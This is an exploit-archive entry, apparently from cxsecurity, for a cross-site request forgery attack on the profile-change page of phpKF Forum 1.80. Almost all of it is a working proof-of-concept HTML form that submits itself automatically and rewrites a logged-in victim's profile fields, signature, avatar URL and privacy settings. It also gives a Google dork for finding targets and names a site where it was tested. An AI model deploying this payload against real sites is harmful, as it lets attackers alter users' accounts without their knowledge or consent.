phpKF Forum profil_degistir.php CSRF

2010-12-07 / 2010-12-08
Credit: FreWaL
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title : phpKF Forum profil_degistir.php CSRF Exploit. # Google Dork : php Kolay Forum (phpKF) &#169; 2007 - 2010 phpKF Ekibi # Date : 05-12-2010 # Author : FreWaL [ For Turkey ] # Software Link : http://www.phpkf.com/dosya.php?no=935 # Version : 1.80 and tested on All version # Tested on : http://www.gameforum.co.tv/profil_degistir.php # My Website : www.imhatimi.org & www.ihtilal.in $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ phpKF Forum profil_degistir.php CSRF Exploit. $ $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <frewal> <form method="POST" action="http://www.w0rms.com/profil_degistir_yap.php"> <br> <input type="hidden" name="profil_degisti_mi" value="form_dolu"> <br> <input type="hidden" name="MAX_FILE_SIZE" value="1022999"> <br> <input type="hidden" name="islem_turu" value="normal"> <br> <input class="formlar" type="text" name="gercek_ad" size="35" maxlength="30" value="NamesLakap"> <br> <input class="formlar" type="text" name="dogum_tarihi" size="10" maxlength="10" value="07-02-1985"> <br> <select class="formlar" name="sehir"> <br> <option value="Adana">Adana</option> <option value="YurtD&#305;?&#305;">Yurt D&#305;?&#305;</option> <option value="Adana">Adana</option> </select> <br> <input class="formlar" type="text" name="web" size="35" maxlength="70" value="http://www.imhatimi.org"> <br> <td bgcolor="#ffffff" class="liste-veri3" align="left"> <select class="formlar" name="tema_secim"><option value="5renkli">5renkli</option></select> </td> <br> <textarea class="formlar" cols="36" rows="9" name="imza" style="width: 240px; height: 130px">Sinirsiz imza</textarea> <br> <tr> <td height="20" colspan="2" class="forum_baslik" align="center"> ANINDA MESAJLA?MA ADRESLER&#304; </td> </tr> <br> <tr> <td class="liste-veri3" bgcolor="#ffffff" align="left"> ICQ Numaran&#305;z: </td> <br> <td bgcolor="#ffffff" class="liste-veri3" align="left"> <input class="formlar" type="text" name="icq" size="35" maxlength="30" value="sanane"> </td> </tr> <br> <tr> <td class="liste-veri3" bgcolor="#ffffff" align="left"> AIM Ad&#305;n&#305;z: </td> <td bgcolor="#ffffff" class="liste-veri3" align="left"> <input class="formlar" type="text" name="aim" size="35" maxlength="70" value="banane"> <br> </td> </tr> <tr> <td class="liste-veri3" bgcolor="#ffffff" align="left"> MSN Messenger Ad&#305;n&#305;z: </td> <td bgcolor="#ffffff" class="liste-veri3" align="left"> <input class="formlar" type="text" name="msn" size="35" maxlength="70" value="onane"> </td> </tr> <br> <tr> <td class="liste-veri3" bgcolor="#ffffff" align="left"> Yahoo! Messenger Ad&#305;n&#305;z: </td> <td bgcolor="#ffffff" class="liste-veri3" align="left"> <input class="formlar" type="text" name="yahoo" size="35" maxlength="70" value="bizene"> </td> </tr> <br> <tr> <td class="liste-veri3" bgcolor="#ffffff" align="left"> Skype Ad&#305;n&#305;z: </td> <td bgcolor="#ffffff" class="liste-veri3" align="left"> <input class="formlar" type="text" name="skype" size="35" maxlength="70" value="sizene"> </td> </tr> <br> <input class="formlar" name="resim_yukle" type="file" size="30" value=""> <br> <input class="formlar" type="text" name="uzak_resim" size="35" maxlength="150" value="http://www.resimmax.net/wp-content/uploads/2010/04/Bu-resimde-hem-essek-hem-fok-bal%C4%B1g%C4%B1-gizli-120x120.jpg"> <br> Hide Email ? (Email Gster Gizle) <br> <td class="liste-veri3" bgcolor="#ffffff" align="left"> <label style="cursor: pointer;"> <input type=radio name="posta_goster" value="1" > Evet</label>&nbsp;&nbsp; <label style="cursor: pointer;"> <input type="radio" name="posta_goster" value="0" checked="checked"> Hay&#305;r</label> </td> <br> Do&#287;um tarihi <br> <td class="liste-veri3" bgcolor="#ffffff" align="left"> <label style="cursor: pointer;"> <input type="radio" name="dogum_tarihi_goster" value="1" checked="checked"> Evet</label>&nbsp;&nbsp; <label style="cursor: pointer;"> <input type="radio" name="dogum_tarihi_goster" value="0" > Hay&#305;r</label> </td> <br> Sehir Gster Gizle <br> <td class="liste-veri3" bgcolor="#ffffff" align="left"> <label style="cursor: pointer;"> <input type="radio" name="sehir_goster" value="1" checked="checked"> Evet</label>&nbsp;&nbsp; <label style="cursor: pointer;"> <input type="radio" name="sehir_goster" value="0" > Hay&#305;r</label> </td> <br> Online - Offline Gster Gizle <br> <td class="liste-veri3" bgcolor="#ffffff" align="left"> evrimii Durumunu Gster: </td> <td class="liste-veri3" bgcolor="#ffffff" align="left"> <label style="cursor: pointer;"> <input type="radio" name="gizli" value="0" checked="checked"> Evet</label>&nbsp;&nbsp; <label style="cursor: pointer;"> <input type="radio" name="gizli" value="1" > Hay&#305;r</label> </td> <br> <script> document.forms[0].submit() </script> </form> </frewal> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ For MecTruy ~ Dr.Ly0n ~ Noxy ~ DeadMaster $ $ Special Thenx all Security Grup $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top